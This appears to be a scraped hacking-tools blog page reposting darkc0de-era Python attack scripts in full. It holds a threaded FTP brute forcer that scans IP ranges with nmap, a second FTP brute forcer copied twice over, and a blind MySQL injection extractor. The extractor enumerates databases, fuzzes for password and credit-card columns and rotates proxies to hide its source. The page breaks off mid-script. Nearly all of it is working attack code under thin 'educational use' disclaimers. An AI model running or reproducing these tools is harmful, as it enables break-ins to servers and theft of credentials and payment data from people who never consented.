#!usr/bin/python
#Ftp Brute Forcer, searches ip_range for hosts using ftp.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, ftplib, re
from ftplib import FTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./ftpbrute.py <ip_range> <userlist> <wordlist>"
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com ftpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
wordlist = copy(words)
def scan():
iprange = sys.argv[1]
ip_list = []
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 21 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
ip_list.append(ipaddr[0])
return ip_list
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
ftp = FTP(ip)
ftp.login(user[:-1], value)
ftp.retrlines('LIST')
print "\t\nLogin successful:",user, value
ftp.quit()
work.join()
sys.exit(2)
except (ftplib.all_errors), msg:
#print "An error occurred:", msg
pass
ip_list = scan()
print "[+] Hosts Loaded:",len(ip_list),"\n"
for ip in ip_list:
print "\n\tAttempting BruteForce:",ip,"\n"
try:
f = FTP(ip)
print "[+] Response:",f.getwelcome()
except (ftplib.all_errors):
pass
try:
print "\n[+] Checking for anonymous login\n"
ftp = FTP(ip)
ftp.login()
ftp.retrlines('LIST')
print "\t\nAnonymous login successful!!!\n"
ftp.quit()
except (ftplib.all_errors):
print "\tAnonymous login unsuccessful\n"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(1)
Showing posts with label python. Show all posts
Showing posts with label python. Show all posts
Thursday, November 25, 2010
ftp brute forcer
#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# This is ftp brute force tools .
# This was written for educational purpose and pentest only. Use it at your own risk.
# Suggestion ! don't use very large wordlist, because system need to read it first for a while and do it @ brute time... "that's cause LOSS" maybe you can use time.sleep(int)
# VISIT : http://www.devilzc0de.com
# CODING BY : gunslinger_
# EMAIL : gunslinger.devilzc0de@gmail.com
# TOOL NAME : ftpbrute.py v1.0
# Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member
# Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family
# Greetz : all member of jasakom.com, jatimcrew.com
# Special i made for jasakom member and devilzc0de family
# Please remember... your action will be logged in target system...
# Author will not be responsible for any damage !!
# Use it with your own risk
import sys
import time
import os
from ftplib import FTP
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
log = "ftpbrute.log"
file = open(log, "a")
def MyFace() :
os.system(SysCls)
print "\n .___ .__ .__ _______ .___ "
print " __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ "
print " / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / "
print " / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / "
print " \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ "
print " \/ \/ \/ \/ \/ \/ \/ \/ \/ "
print " http://www.devilzc0de.com "
print " by : gunslinger_ "
print " ftpbrute.py version 1.0 "
print " Brute forcing ftp target "
print " Programmmer : gunslinger_ "
print " gunslinger[at]devilzc0de[dot]com "
print "_______________________________________________________________________________________________________________________________________\n"
file.write("\n .___ .__ .__ _______ .___ ")
file.write("\n __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ ")
file.write("\n / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / ")
file.write("\n / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / ")
file.write("\n \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ ")
file.write("\n \/ \/ \/ \/ \/ \/ \/ \/ \/ ")
file.write("\n http://www.devilzc0de.com ")
file.write("\n by : gunslinger_ ")
file.write("\n ftpbrute.py version 1.0 ")
file.write("\n Brute forcing ftp target ")
file.write("\n Programmmer : gunslinger_ ")
file.write("\n gunslinger[at]devilzc0de[dot]com ")
file.write("\n_______________________________________________________________________________________________________________________________________\n")
def HelpMe() :
MyFace()
print 'Usage: ./ftpbrute.py [options]\n'
print 'Options: -t, --target <hostname/ip> | Target to bruteforcing '
print ' -u, --user <user> | User for bruteforcing'
print ' -w, --wordlist <filename> | Wordlist used for bruteforcing'
print ' -h, --help <help> | print this help'
print ' \n'
print 'Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt \n'
file.write( '\nUsage: ./ftpbrute.py [options]')
file.write( '\nOptions: -t, --target <hostname/ip> | Target to bruteforcing ')
file.write( '\n -u, --user <user> | User for bruteforcing')
file.write( '\n -w, --wordlist <filename> | Wordlist used for bruteforcing')
file.write( '\n -h, --help <help> | print this help')
file.write( '\n maybe you can use time.sleep(int) \n')
file.write( '\nExample: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt \n')
sys.exit(1)
for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-u' or arg.lower() == '--user':
user = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
HelpMe()
elif len(sys.argv) <= 1:
HelpMe()
def BruteForce(word) :
print "[?]Trying :",word
file.write("\n[?]Trying :"+word)
try:
ftp = FTP(hostname)
ftp.login(user, word)
ftp.retrlines('list')
ftp.quit()
print "\n\t[!] Login Success ! "
print "\t[!] Username : ",user, ""
print "\t[!] Password : ",word, ""
print "\t[!] Hostname : ",hostname, ""
print "\t[!] Log all has been saved to",log,"\n"
file.write("\n\n\t[!] Login Success ! ")
file.write("\n\t[!] Username : "+user )
file.write("\n\t[!] Password : "+word )
file.write("\n\t[!] Hostname : "+hostname)
file.write("\n\t[!] Log all has been saved to "+log)
sys.exit(1)
except Exception, e:
#print "[-] Failed"
pass
except KeyboardInterrupt:
print "\n[-] Aborting...\n"
file.write("\n[-] Aborting...\n")
sys.exit(1)
def Action ():
MyFace()
print "[!] Starting attack at %s" % time.strftime("%X")
print "[!] System Activated for brute forcing..."
print "[!] Please wait until brute forcing finish !\n"
file.write("\n[!] Starting attack at %s" % time.strftime("%X"))
file.write("\n[!] System Activated for brute forcing...")
file.write("\n[!] Please wait until brute forcing finish !\n")
Action()
try:
words = open(wordlist, "r").readlines()
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
file.write("\n[-] Error: Check your wordlist path\n")
sys.exit(1)
print "\n[+] Loaded:",len(words),"words"
print "[+] Server:",hostname
print "[+] User:",user
print "[+] BruteForcing...\n"
for word in words:
BruteForce(word.replace("\n",""))
file.close()
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# This is ftp brute force tools .
# This was written for educational purpose and pentest only. Use it at your own risk.
# Suggestion ! don't use very large wordlist, because system need to read it first for a while and do it @ brute time... "that's cause LOSS" maybe you can use time.sleep(int)
# VISIT : http://www.devilzc0de.com
# CODING BY : gunslinger_
# EMAIL : gunslinger.devilzc0de@gmail.com
# TOOL NAME : ftpbrute.py v1.0
# Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member
# Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family
# Greetz : all member of jasakom.com, jatimcrew.com
# Special i made for jasakom member and devilzc0de family
# Please remember... your action will be logged in target system...
# Author will not be responsible for any damage !!
# Use it with your own risk
import sys
import time
import os
from ftplib import FTP
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
log = "ftpbrute.log"
file = open(log, "a")
def MyFace() :
os.system(SysCls)
print "\n .___ .__ .__ _______ .___ "
print " __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ "
print " / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / "
print " / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / "
print " \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ "
print " \/ \/ \/ \/ \/ \/ \/ \/ \/ "
print " http://www.devilzc0de.com "
print " by : gunslinger_ "
print " ftpbrute.py version 1.0 "
print " Brute forcing ftp target "
print " Programmmer : gunslinger_ "
print " gunslinger[at]devilzc0de[dot]com "
print "_______________________________________________________________________________________________________________________________________\n"
file.write("\n .___ .__ .__ _______ .___ ")
file.write("\n __| _/ ____ ___ __|__|| | ________ ____ \ _ \ __| _/ ____ ____ _______ ____ __ _ __ ")
file.write("\n / __ |_/ __ \\\ \/ /| || | \___ /_/ ___\/ /_\ \ / __ |_/ __ \ _/ ___\\\_ __ \_/ __ \\\ \/ \/ / ")
file.write("\n / /_/ |\ ___/ \ / | || |__ / / \ \___\ \_/ \/ /_/ |\ ___/ \ \___ | | \/\ ___/ \ / ")
file.write("\n \____ | \___ > \_/ |__||____//_____ \ \___ >\_____ /\____ | \___ > \___ >|__| \___ > \/\_/ ")
file.write("\n \/ \/ \/ \/ \/ \/ \/ \/ \/ ")
file.write("\n http://www.devilzc0de.com ")
file.write("\n by : gunslinger_ ")
file.write("\n ftpbrute.py version 1.0 ")
file.write("\n Brute forcing ftp target ")
file.write("\n Programmmer : gunslinger_ ")
file.write("\n gunslinger[at]devilzc0de[dot]com ")
file.write("\n_______________________________________________________________________________________________________________________________________\n")
def HelpMe() :
MyFace()
print 'Usage: ./ftpbrute.py [options]\n'
print 'Options: -t, --target <hostname/ip> | Target to bruteforcing '
print ' -u, --user <user> | User for bruteforcing'
print ' -w, --wordlist <filename> | Wordlist used for bruteforcing'
print ' -h, --help <help> | print this help'
print ' \n'
print 'Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt \n'
file.write( '\nUsage: ./ftpbrute.py [options]')
file.write( '\nOptions: -t, --target <hostname/ip> | Target to bruteforcing ')
file.write( '\n -u, --user <user> | User for bruteforcing')
file.write( '\n -w, --wordlist <filename> | Wordlist used for bruteforcing')
file.write( '\n -h, --help <help> | print this help')
file.write( '\n maybe you can use time.sleep(int) \n')
file.write( '\nExample: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt \n')
sys.exit(1)
for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-u' or arg.lower() == '--user':
user = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
HelpMe()
elif len(sys.argv) <= 1:
HelpMe()
def BruteForce(word) :
print "[?]Trying :",word
file.write("\n[?]Trying :"+word)
try:
ftp = FTP(hostname)
ftp.login(user, word)
ftp.retrlines('list')
ftp.quit()
print "\n\t[!] Login Success ! "
print "\t[!] Username : ",user, ""
print "\t[!] Password : ",word, ""
print "\t[!] Hostname : ",hostname, ""
print "\t[!] Log all has been saved to",log,"\n"
file.write("\n\n\t[!] Login Success ! ")
file.write("\n\t[!] Username : "+user )
file.write("\n\t[!] Password : "+word )
file.write("\n\t[!] Hostname : "+hostname)
file.write("\n\t[!] Log all has been saved to "+log)
sys.exit(1)
except Exception, e:
#print "[-] Failed"
pass
except KeyboardInterrupt:
print "\n[-] Aborting...\n"
file.write("\n[-] Aborting...\n")
sys.exit(1)
def Action ():
MyFace()
print "[!] Starting attack at %s" % time.strftime("%X")
print "[!] System Activated for brute forcing..."
print "[!] Please wait until brute forcing finish !\n"
file.write("\n[!] Starting attack at %s" % time.strftime("%X"))
file.write("\n[!] System Activated for brute forcing...")
file.write("\n[!] Please wait until brute forcing finish !\n")
Action()
try:
words = open(wordlist, "r").readlines()
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
file.write("\n[-] Error: Check your wordlist path\n")
sys.exit(1)
print "\n[+] Loaded:",len(words),"words"
print "[+] Server:",hostname
print "[+] User:",user
print "[+] BruteForcing...\n"
for word in words:
BruteForce(word.replace("\n",""))
file.close()
mysql 4.x 5.x blind injector
#!/usr/bin/python
# Features!
# 1.MySQL Blind Injection Data Extractor
# 2.MySQL Blind Information_schema Database Enumerator
# 3.MySQL Blind Table and Column Fuzzer
# Feel free to do whatever you want with this code!
# Share the c0de!
# Darkc0de Team
# www.darkc0de.com
# rsauron[at]gmail[dot]com
# Greetz to
# d3hydr8, P47r1ck, Tarsian, c0mr@d, reverenddigitalx
# and the rest of the Darkc0de members
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!
# BE WARNED, THIS TOOL IS VERY LOUD..
# Change Log
# 2.9 - added info mode, bug fix in the GuessValue function
# 3.0 - added row option.. now you can tell the app where to begin - remember limit start at 0 not 1
#Fill in the tables you want tested here.
fuzz_tables = ["user","users","username","usernames","mysql.user","orders","order_items","member","members","admin","administrator","administrators","login","logins","logon","jos_users","jos_contact_details","userrights","account","superuser","control","usercontrol","author","autore","artikel","newsletter","tb_user","tb_users","tb_username","tb_usernames","tb_admin","tb_administrator","tb_member","tb_members","tb_login","perdorues","korisnici","webadmin","webadmins","webuser","webusers","webmaster","webmasters","customer","customers","sysuser","sysusers","sysadmin","sysadmins","memberlist","tbluser","tbl_user","tbl_users","a_admin","x_admin","m_admin","adminuser","admin_user","adm","userinfo","user_info","admin_userinfo","userlist","user_list","user_admin","order","user_login","admin_user","admin_login","login_user","login_users","login_admin","login_admins","sitelogin","site_login","sitelogins","site_logins","SiteLogin","Site_Login","User","Users","Admin","Admins","Login","Logins","adminrights","news","perdoruesit"]
#Fill in the columns you want tested here.
fuzz_columns = ["user","username","password","passwd","pass","id","email","emri","fjalekalimi","pwd","user_name","customers_email_address","customers_password","user_password","name","user_pass","admin_user","admin_password","admin_pass","usern","user_n","users","login","logins","login_user","login_admin","login_username","user_username","user_login","auid","apwd","adminid","admin_id","adminuser","admin_user","adminuserid","admin_userid","adminusername","admin_username","adminname","admin_name","usr","usr_n","usrname","usr_name","usrpass","usr_pass","usrnam","nc","uid","userid","user_id","myusername","mail","emni","logohu","punonjes","kpro_user","wp_users","emniplote","perdoruesi","perdorimi","punetoret","logini","llogaria","fjalekalimin","kodi","emer","ime","korisnik","korisnici","user1","administrator","administrator_name","mem_login","login_password","login_pass","login_passwd","login_pwd","sifra","lozinka","psw","pass1word","pass_word","passw","pass_w","user_passwd","userpass","userpassword","userpwd","user_pwd","useradmin","user_admin","mypassword","passwrd","admin_pwd","admin_pass","admin_passwd","mem_password","memlogin","admin_id","adminid","e_mail","usrn","u_name","uname","mempassword","mem_pass","mem_passwd","mem_pwd","p_word","pword","p_assword","myusername","myname","my_username","my_name","my_password","my_email","cvvnumber","order_payment","card_number","is_admin","cc_number","ccnum","cc_num","credit_card_number","cvc_code","billing_first_name","cvv","cvv2","firstname","lastname","fname","lname","first","last"]
import urllib, sys, re, os, socket, httplib, urllib2, time
#the guts and glory - Binary Algorithim that does all the guessing
def GuessValue(URL):
global gets
global proxy_num
lower = lower_bound
upper = upper_bound
while lower < upper:
try:
mid = (lower + upper) / 2
head_URL = URL + ">"+str(mid)
#print head_URL
gets+=1
proxy_num+=1
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall(string,source)
if len(match) >= 1:
lower = mid + 1
else:
upper = mid
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
if lower > lower_bound and lower < upper_bound:
value = lower
else:
head_URL = URL + "="+str(lower)
gets+=1
proxy_num+=1
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall(string,source)
if len(match) >= 1:
value = lower
else:
value = 63
print "Could not find the ascii character! There must be a problem.."
print "Check to make sure your using the app right!"
print "READ xprog's blind sql tutorial!\n"
sys.exit(1)
return value
#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
print "\n|---------------------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v3.0 |"
print "| 7/2008 blindext.py |"
print "| -Blind MySQL v5+ Information_schema Database Enumeration |"
print "| -Blind MySQL v4+ Data Extractor |"
print "| -Blind MySQL v4+ Table & Column Fuzzer |"
print "| Usage: blindext.py [options] |"
print "| -h help darkc0de.com |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
#define varablies
site = ""
string = ""
dbt = "blindextlog.txt"
proxy = "None"
count = 0
mode = "None"
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_dump = "None"
arg_schema = "None"
arg_dbs = "None"
arg_mysqldb = ""
darkc0de = ""
line_URL = ""
lower_bound = 0
upper_bound = 10000
gets = 0
mid =0
let_pos = 1
lim_num = 0
value = ""
#help option
for arg in sys.argv:
if arg == "-h":
print "\n Usage: ./blindext.py [options] rsauron[@]gmail[dot]com darkc0de.com"
print "\tModes:"
print "\tDefine: --schema Enumerate Information_schema Database."
print "\tDefine: --dump Extract information from a Database, Table and Column."
print "\tDefine: --dbs Shows all databases user has access too."
print "\tDefine: --fuzz Fuzz Tables and Columns."
print "\tDefine: --info Prints server version, username@location, database name."
print "\n\tRequired:"
print "\tDefine: -u \"www.site.com/news.php?id=234\""
print "\tDefine: -s \"truetextinpage\""
print "\n\tModes dump and schema options:"
print "\tDefine: -D \"database_name\""
print "\tDefine: -T \"table_name\""
print "\tDefine: -C \"column_name,column_name...\""
print "\n\tOptional:"
print "\tDefine: -r row to begin extracting info at."
print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
print "\tDefine: -o \"ouput_file_name.txt\" Default:blindextlog.txt"
print "\n Ex: ./blindext.py --dbs -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -o output.txt"
print " Ex: ./blindext.py --fuzz -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -p 127.0.0.1:8080"
print " Ex: ./blindext.py --schema -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -D catalog"
print " Ex: ./blindext.py --schema -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -D catalog -T orders -p proxy.txt"
print " Ex: ./blindext.py --dump -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -D newjoom -T jos_users -C username,password"
sys.exit(1)
#Check args
for arg in sys.argv:
if arg == "-u":
site = sys.argv[count+1]
elif arg == "-s":
string = sys.argv[count+1]
elif arg == "-o":
dbt = sys.argv[count+1]
elif arg == "-p":
proxy = sys.argv[count+1]
elif arg == "--dump":
mode = arg
arg_dump = sys.argv[count]
elif arg == "--schema":
mode = arg
arg_schema = sys.argv[count]
elif arg == "--dbs":
mode = arg
arg_dbs = sys.argv[count]
elif arg == "--fuzz":
mode = arg
arg_fuzz = sys.argv[count]
elif arg == "--info":
mode = arg
arg_info = sys.argv[count]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "-r":
lim_num = sys.argv[count+1]
count+=1
#Title write
file = open(dbt, "a")
print "\n|---------------------------------------------------------------|"
print "| rsauron[@]gmail[dot]com v3.0 |"
print "| 7/2008 blindext.py |"
print "| -Blind MySQL v5+ Information_schema Database Enumeration |"
print "| -Blind MySQL v4+ Data Extractor |"
print "| -Blind MySQL v4+ Table & Column Fuzzer |"
print "| Usage: blindext.py [options] |"
print "| -h help darkc0de.com |"
print "|---------------------------------------------------------------|"
file.write("\n\n|---------------------------------------------------------------|")
file.write("\n| rsauron[@]gmail[dot]com v3.0 |")
file.write("\n| 7/2008 blindext.py |")
file.write("\n| -Blind MySQL v5+ Information_schema Database Enumeration |")
file.write("\n| -Blind MySQL v4+ Data Extractor |")
file.write("\n| -Blind MySQL v4+ Table & Column Fuzzer |")
file.write("\n| Usage: blindext.py [options] |")
file.write("\n| -h help darkc0de.com |")
file.write("\n|---------------------------------------------------------------|")
#Arg Error Checking
if site == "":
print "\n[-] Must include -u flag and -s flag."
print "[-] For help -h\n"
sys.exit(1)
if string == "":
print "\n[-] Must include -s flag followed by \"truetextinpage\" string."
print "[-] For help -h\n"
sys.exit(1)
if mode == "None":
print "\n[-] Mode must be specified --schema --dbs --dump --fuzz"
print "[-] For help -h\n"
sys.exit(1)
if mode == "--schema" and arg_database == "None":
print "[-] Must include -D flag!"
print "[-] For Help -h\n"
sys.exit(1)
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!"
print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!"
print "[-] For help -h\n"
sys.exit(1)
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if arg_columns != "None":
arg_columns = arg_columns.split(",")
if site[:7] != "http://":
site = "http://"+site
#Build proxy list
print "\n[+] URL:",site
file.write("\n\n[+] URL:"+site+"\n")
socket.setdefaulttimeout(10)
proxy_list = []
if proxy != "None":
file.write("[+] Building Proxy List...")
print "[+] Building Proxy List..."
for p in proxy:
try:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_handler))
file.write("\n\tProxy:"+p+"- Success")
print "\tProxy:",p,"- Success"
except:
file.write("\n\tProxy:"+p+"- Failed")
print "\tProxy:",p,"- Failed"
pass
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
file.write("\n[-] All proxies have failed. App Exiting\n")
sys.exit(1)
print "[+] Proxy List Complete"
file.write("[+] Proxy List Complete")
else:
print "[-] Proxy Not Given"
file.write("[+] Proxy Not Given")
proxy_list.append(urllib2.build_opener())
#Gather Server Config
print "[+] Gathering MySQL Server Configuration..."
file.write("\n[+] Gathering MySQL Server Configuration...")
proxy_num = 0
proxy_len = len(proxy_list)
ser_ver = 3
while 1:
try:
config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
proxy_num+=1
source = proxy_list[proxy_num % proxy_len].open(config_URL).read()
match = re.findall(string,source)
if len(match) >= 1:
print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!"
file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
if int(ser_ver) <= 4 and mode == "--schema":
print "\t[-] Schema & dbs mode only works on MySQL v5+!!"
file.write("\n\t[-] Schema & dbs mode only work on MySQL v5+!!")
print "[-] Done"
file.write("[-] Done")
sys.exit(1)
if int(ser_ver) <= 4 and mode == "--dbs":
print "\t[-] Schema & dbs mode only works on MySQL v5+!!"
file.write("\n\t[-] Schema & dbs mode only work on MySQL v5+!!")
print "[-] Done"
file.write("[-] Done")
sys.exit(1)
break
if int(ser_ver) >= 6:
print "\t[-] Not a MySQL server or the string your using is not being found!"
file.write("\n\t[-] Not a MySQL server or the string your using is not being found!")
print "[-] Done"
file.write("[-] Done")
sys.exit(1)
ser_ver+=1
gets+=1
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
#Build URLS
if mode == "--schema":
if arg_database != "None" and arg_table == "None":
print "[+] Showing Tables from database \""+arg_database+"\""
file.write("\n[+] Showing Tables from database \""+arg_database+"\"")
count_URL = site+"+and+((SELECT+COUNT(table_name)"
count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema+=+0x"+arg_database.encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+table_name"
line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema+=+0x"+arg_database.encode("hex")
if arg_database != "None" and arg_table != "None":
print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\""
file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
count_URL = site+"+and+((SELECT+COUNT(column_name)"
count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
count_URL += "+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+column_name"
line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
line_URL += "+AND+table_name+=+0x"+arg_table.encode("hex")
elif mode == "--dump":
print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
print "[+] and Column(s) "+str(arg_columns)
file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
file.write("\n[+] Column(s) "+str(arg_columns))
for column in arg_columns:
darkc0de += column+",0x3a,"
darkc0de = darkc0de.rstrip("0x3a,")
count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"
count_URL = count_URL+""+arg_database+"."+arg_table+"))"
line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"
line_URL = line_URL+""+arg_database+"."+arg_table
if ser_ver == 4:
count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_table+"))"
line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_table
if arg_database == "mysql" or arg_database == "MYSQL" or arg_database == "MySQL":
count_URL = site+"+and+((SELECT+COUNT(*)+FROM+mysql."+arg_table+"))"
line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+mysql."+arg_table
elif mode == "--dbs":
print "[+] Showing all databases current user has access too!"
file.write("\n[+] Showing all databases current user has access too!")
count_URL = site+"+and+((SELECT+COUNT(schema_name)"
count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
line_URL = site+"+and+ascii(substring((SELECT+schema_name"
line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
line_URL += "+LIMIT+"
if mode == "--info":
print "[+] Showing database version, username@location, and database name!"
file.write("\n[+] Showing database version, username@location, and database name!")
count_URL = "Nothing"
line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"
#Lets Fuzz
if mode == "--fuzz":
print "\n[%s] StartTime" % time.strftime("%X")
file.write("\n\n[%s] StartTime" % time.strftime("%X"))
print "[+] Fuzzing Tables..."
file.write("\n[+] Fuzzing Tables...")
fuzz_TABLE_url = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
for table in fuzz_tables:
try:
proxy_num+=1
gets+=1
table_URL = fuzz_TABLE_url.replace("TABLE",table)
source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
match = re.findall(string,source)
if len(match) >= 1:
print "\n[Table]:",table
file.write("\n\n[Table]:"+table)
fuzz_COLUMN_url = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
for column in fuzz_columns:
try:
